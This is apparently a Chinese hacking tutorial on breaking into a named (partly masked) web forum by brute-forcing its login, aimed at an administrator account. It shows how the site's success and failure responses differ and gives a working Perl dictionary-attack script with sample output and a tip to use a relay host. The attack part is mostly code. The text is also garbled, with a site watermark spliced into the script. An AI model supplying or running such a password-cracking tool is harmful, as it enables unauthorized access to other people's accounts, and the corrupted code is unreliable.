习惯先查看用户信息,因为一般情况下用户名和密码都是紧连着保存在一起的,在这里我们更容易接近我们想要的信息。提交如下URL查看silkroad用户信息:http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad返回正常用户信息
http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=./silkroad同样返回正常用户信息,看来.和/已经被过滤掉了
http://www.****bbs.com/yhreg.cgi?menu=viewuser&username=silkroad
这个是成功登陆后返回的信息
返回的信息的第七行"fe7"和"18d"不同,我们就从这里下手
现在到社区的管理团队上看看管理员的ID,其中一个管理员的ID是“秘密”
三、程序代码/代码解析思路(步骤):取得IP ---> 打开字典,字典里每一行一个密码 ---> socket() ---> connect() ---> 向目标主机WEB端口提交数据,此数据中所提交的密码用一个变量来代替,这个变量就是字典里的密码 ---> 将返回的信息保存,用先前提到的登陆成功/失败返回信息的不同点进行对比,判断是否登陆成功,即密码是否正确 ---> [ 当前密码正确--->输出正确的密码并退出程序; 当前密码错误--->从第二步骤开始重复,直到密码正确或试完字典里的所有密码 ]
#!/usr/bin/perl##################################################################
use Socket; #使用Socket模块
my $ARGC=@ARGV; #取得参数的数量if($ARGC!=1){print "\nPassword Cracker Tool By HBU-the0crat\nUsage:$0 TargetIP\n";exit;}
my $host=shift; #获取主机IPprint "\nSending...";
open(FH,"<dic.dic"); #挂字典
while(<FH>) #读取字典{chomp;my $pwd= 用户名:@HackBase.net密 码: $Content$Content$nbsp;
;my $req="GET http://www.****bbs.com/login.cgi?username=asdfasdf&userpsd=$pwd&menu=login&id= HTTP/1.1\n"."host:iis-server\n\n"; #提交的信息
my @res=sendraw($req); #将目标服务器返回的信息保存为数组
if($res[6]=~/fe7/g) #从@res数组中取得所返回信息的第7行,并进行判断。判断依据:前文中用telnet所获知的用来判断密码是否正确的字符{print "\npwd:$pwd error";} #如果返回的信息中的第7行中包含fe7这三个字符,则在屏幕上打印出密码错误的信息else{print "\npwd:$pwd passed"; #因为成功登陆后返回的信息中的第7行不包含fe7这三个字符,所以如果第7行中不包含fe7这三个字符就表示登陆成功,即密码正确close(FH);exit; #探测到正确密码立刻退出}
} #对比判断是否登陆成功的循环close(FH);
sub sendraw {my ($req2) = @_;my $target;$target = inet_aton($host) or die "\ninet_aton problems"; #转换目标IPsocket(Handle,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) or die "\nSocket problems\n"; #Socketif(connect(Handle,pack "SnA4x8",2,80,$target)){ #此例中为80端口,根据实际情况更改select(Handle);$| = 1;print $req2; #向目标服务器提交登陆资料my @res2 = <Handle>; #取得目标服务器返回的信息select(STDOUT);close(Handle);return @res2; #将目标服务器返回的信息作为sendraw()函数的返回值}else {die("\nCan't connect to $host:80...\n");}}
四、演示dic.dic内容如下:asdfasdfasdfasdfa运行这个脚本(win2k activeperl5.6下通过)C:\>cracker.pl www.****bbs.com
Sending...pwd:asdf errorpwd:asdfasdf passed
程序探测到正确密码后退出...:)
注意要根据实际情况更改提交的信息和判断依据,以及WEB端口挂个字典,就可以慢慢等密码出来了,然而更多时候是取决于你的运气
五、总结弊:这段代码用的是单线程,所以在探测的速度上不是很理想,有兴趣的可以去改改,在没有使用跳板的情况下对自己不安全,而且成功率很大程度上取决于你的运气利:这种方法比较有效, 但也是比较没有效率的密码破解方式